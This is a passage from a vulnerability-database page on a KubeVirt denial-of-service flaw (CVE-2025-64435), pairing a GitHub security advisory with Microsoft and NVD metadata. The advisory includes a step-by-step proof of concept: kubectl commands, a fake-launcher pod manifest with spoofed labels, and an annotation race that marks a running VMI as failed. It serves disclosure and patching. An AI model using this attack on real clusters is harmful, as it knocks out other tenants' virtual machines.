pkg/controller/controller_ref.go\n\n\n// GetControllerOf returns the controllerRef if controllee has a controller,\n// otherwise returns nil.\nfunc GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {\n\tcontrollerRef := metav1.GetControllerOf(pod)\n\tif controllerRef != nil {\n\t\treturn controllerRef\n\t}\n\t// We may find pods that are only using CreatedByLabel and not set with an OwnerReference\n\tif createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) \u003e 0 {\n\t\tname := pod.Annotations[virtv1.DomainAnnotation]\n\t\tuid := types.UID(createdBy)\n\t\tvmi := virtv1.NewVMI(name, uid)\n\t\treturn metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)\n\t}\n\treturn nil\n}\n\nfunc IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {\n\tif controllerRef := GetControllerOf(pod); controllerRef != nil {\n\t\treturn controllerRef.UID == vmi.UID\n\t}\n\treturn false\n}\n```\n\nThe current logic assumes that a `virt-launcher` pod associated with a VMI may not always have a `controllerRef`. In such cases, the controller falls back to inspecting the pod\u0027s labels. Specifically it evaluates the `kubevirt.io/created-by` label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the `virt-controller` selects the most recently created one.\n\nThis logic appears to be designed with migration scenarios in mind, where it is expected that two `virt-launcher` pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate `virt-launcher` pod lacks a `controllerRef` and relies solely on labels (such as `kubevirt.io/created-by`) to indicate its association with a VMI.\n\nThis fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate `virt-launcher` pod. As a result, the `CurrentVMIPod` function could mistakenly return the attacker-controlled pod instead of the authentic one.\n\nThis vulnerability has at least two serious consequences:\n\n- The attacker could disrupt or seize control over the VMI\u0027s lifecycle operations.\n- The attacker could potentially influence the VMI\u0027s migration target node, bypassing node-level security constraints such as `nodeSelector` or `nodeAffinity`, which are typically used to enforce workload placement policies.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nConsider the following VMI definition:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n name: launcher-label-confusion\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\n\n```bash\n# Deploy the launcher-label-confusion VMI\noperator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml\n# Get the UID of the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.metadata.uid}\u0027\n18afb8bf-70c4-498b-aece-35804c9a0d11\n# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027\n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"}\n```\n\nThe UID of the VMI can also be found as an argument to the container in the `virt-launcher` pod:\n\n```bash\n# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched\noperator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath=\u0027{.spec.containers[0]}\u0027 | jq .\n{\n \"command\": [\n \"/usr/bin/virt-launcher-monitor\",\n ...\n \"--uid\",\n \"18afb8bf-70c4-498b-aece-35804c9a0d11\", \n \"--namespace\",\n \"default\",\n ...\n```\n\nConsider the following attacker-controlled pod which is associated to the VMI using the UID defined in the `kubevirt.io/created-by` label:\n\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n name: fake-launcher\n labels:\n kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components\n kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods\n kubevirt.io/domain: migration\nspec:\n restartPolicy: Never\n containers:\n - name: alpine\n image: alpine\n command: [ \"sleep\", \"3600\" ]\n```\n\n```bash\noperator@minikube:~$ kubectl apply -f fake-launcher.yaml\n# Get the UID of the `fake-launcher` pod\noperator@minikube:~$ kubectl get pod fake-launcher -o jsonpath=\u0027{.metadata.uid}\u0027\n39479b87-3119-43b5-92d4-d461b68cfb13\n```\n\nTo effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:\n\n```bash\n# Trigger the VMI reconciliation loop\noperator@minikube:~$ kubectl patch vmi launcher-label-confusion -p \u0027{\"metadata\":{\"annotations\":{\"trigger-annotation\":\"quarkslab\"}}}\u0027 --type=merge\nvirtualmachineinstance.kubevirt.io/launcher-label-confusion patched\n# Confirm that fake-launcher pod has been associated with the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027\n{\"39479b87-3119-43b5-92d4-d461b68cfb13\":\"minikube\", # `fake-launcher` pod\u0027s UID\n\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"} # original `virt-launcher` pod UID\n```\n\n\nTo illustrate the impact of this vulnerability, a race condition will be triggered in the `sync` function of the VMI controller:\n\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {\n //...\n if !isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod) {\n\n\t\t// mark the pod with annotation to be evicted by this controller\n\t\tnewAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: \"\"}\n\t\tmaps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))\n // here a new updated pod is returned\n\t\tpatchedPod, err := c.syncPodAnnotations(pod, newAnnotations)\n\t\tif err != nil {\n\t\t\treturn common.NewSyncError(err, controller.FailedPodPatchReason), pod\n\t\t}\n\t\tpod = patchedPod\n // ...\n\nfunc (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {\n\tpatchSet := patch.New()\n\tfor key, newValue := range newAnnotations {\n\t\tif podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {\n\t\t\tpatchSet.AddOption(\n\t\t\t\tpatch.WithAdd(fmt.Sprintf(\"/metadata/annotations/%s\", patch.EscapeJSONPointer(key)), newValue),\n\t\t\t)\n\t\t}\n\t}\n\tif patchSet.IsEmpty() {\n\t\treturn pod, nil\n\t}\n\t\n\tpatchBytes, err := patchSet.GeneratePayload()\n\t// ...\n\tpatchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})\n // ...\n\treturn patchedPod, nil\n}\n```\n\nThe above code adds additional annotations to the `virt-launcher` pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.\nThere is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc isTempPod(pod *k8sv1.Pod) bool {\n // EphemeralProvisioningObject string = \"kubevirt.io/ephemeral-provisioning\"\n\t_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]\n\treturn ok\n}\n```\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {\n // ...\n vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)\n\ttempPodExists := controller.PodExists(pod) \u0026\u0026 isTempPod(pod)\n\n //...\n case vmi.IsRunning():\n\t\tif !vmiPodExists {\n // MK: this will toggle the VMI phase to Failed\n\t\t\tvmiCopy.Status.Phase = virtv1.Failed\n\t\t\tbreak\n\t\t}\n //...\n\n vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)\n\tif vmiChanged {\n // MK: this will detect that the phase of the VMI has changed and updated the resource\n\t\tkey := controller.VirtualMachineInstanceKey(vmi)\n\t\tc.vmiExpectations.SetExpectations(key, 1, 0)\n\t\t_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\tc.vmiExpectations.LowerExpectations(key, 1, 0)\n\t\t\treturn err\n\t\t}\n\t}\n```\n\nTo trigger it, the attacker should update the `fake-launcher` pod\u0027s annotations before the check `vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)` in `sync`, and between the check `if !isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod)` in `sync` but before the patch API call in `syncPodAnnotations` as follows:\n\n```yaml\nannotations:\n kubevirt.io/ephemeral-provisioning: \"true\"\n```\n\nThe above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).\n\nThe update should also happen during the reconciliation loop when the `fake-launcher` pod is initially going to be associated with the VMI and its labels, related to eviction, updated.\n\n\nUpon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:\n\n\n```bash\noperator@minikube:~$ kubectl get vmi\nNAME AGE PHASE IP NODENAME READY\nlauncher-label-confusion 128m Failed 10.244.0.10 minikube False\n# The VMI is not reachable anymore \noperator@minikube:~$ virtctl console launcher-label-confusion\nOperation cannot be fulfilled on virtualmachineinstance.kubevirt.io \"launcher-label-confusion\": VMI is in failed status\n\n# The two pods are still associated with the VMI\n\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027 \n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\",\"ca31c8de-4d14-4e47-b942-75be20fb9d96\":\"minikube\"}\n```\n\n### Impact\nAs a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.",
"id": "GHSA-9m94-w2vq-hcf9",
"modified": "2025-11-17T21:43:42Z",
"published": "2025-11-06T23:35:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64435"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
MSRC_CVE-2025-64435
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2026-01-08 14:37Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation",
"tracking": {
"current_release_date": "2026-01-08T14:37:49.000Z",
"generator": {
"date": "2026-02-18T14:58:53.121Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64435",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:02:03.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:37.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:48:08.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2025-12-15T14:35:26.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
},
{
"date": "2025-12-23T01:37:09.000Z",
"legacy_version": "5",
"number": "5",
"summary": "Information published."
},
{
"date": "2026-01-02T14:39:36.000Z",
"legacy_version": "6",
"number": "6",
"summary": "Information published."
},
{
"date": "2026-01-08T14:37:49.000Z",
"legacy_version": "7",
"number": "7",
"summary": "Information published."
}
],
"status": "final",
"version": "7"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "5"
}
},
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "6"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.3-2",
"product": {
"name": "\u003cazl3 kubevirt 1.5.3-2",
"product_id": "4"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.3-2",
"product": {
"name": "azl3 kubevirt 1.5.3-2",
"product_id": "20673"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "20703"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-33",
"product": {
"name": "cbl2 kubevirt 0.59.0-33",
"product_id": "20772"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.6.3-1",
"product": {
"name": "\u003cazl3 kubevirt 1.6.3-1",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.6.3-1",
"product": {
"name": "azl3 kubevirt 1.6.3-1",
"product_id": "20792"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-5"
},
"product_reference": "5",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-6"
},
"product_reference": "6",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
"product_id": "17084-4"
},
"product_reference": "4",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
"product_id": "20673-17084"
},
"product_reference": "20673",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-3"
},
"product_reference": "3",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "20703-17086"
},
"product_reference": "20703",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "20772-17086"
},
"product_reference": "20772",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.6.3-1 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.6.3-1 as a component of Azure Linux 3.0",
"product_id": "20792-17084"
},
"product_reference": "20792",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64435",
"cwe": {
"id": "CWE-703",
"name": "Improper Check or Handling of Exceptional Conditions"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20673-17084",
"20703-17086",
"20772-17086",
"20792-17084"
],
"known_affected": [
"17084-5",
"17086-6",
"17084-4",
"17086-3",
"17086-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:02:03.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17084-5"
]
},
{
"category": "none_available",
"date": "2025-11-09T01:02:03.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-6"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "1.5.3-3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-4"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "0.59.0-33:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-3",
"17086-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "1.6.3-1:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 5.3,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17084-5",
"17086-6",
"17084-4",
"17086-3",
"17086-2",
"17084-1"
]
}
],
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
]
}
FKIE_CVE-2025-64435
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:15{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "5115F453-4A3D-438D-A8F3-94C5E8451F45",
"versionEndIncluding": "1.6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "6C13B76B-290B-4D75-AF75-54FEC43B75C4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de la versi\u00f3n 1.7.0-beta.0, un fallo l\u00f3gico en el virt-controller permite a un atacante interrumpir el control sobre una VMI en ejecuci\u00f3n al crear un pod con las mismas etiquetas que el pod virt-launcher leg\u00edtimo asociado a la VMI. Esto puede inducir a error al virt-controller para que asocie el pod falso con la VMI, lo que resulta en actualizaciones de estado incorrectas y potencialmente causando un DoS (Denial-of-Service). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 1.7.0-beta.0."
}
],
"id": "CVE-2025-64435",
"lastModified": "2025-11-25T17:15:44.140",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-07T23:15:45.850",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-703"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.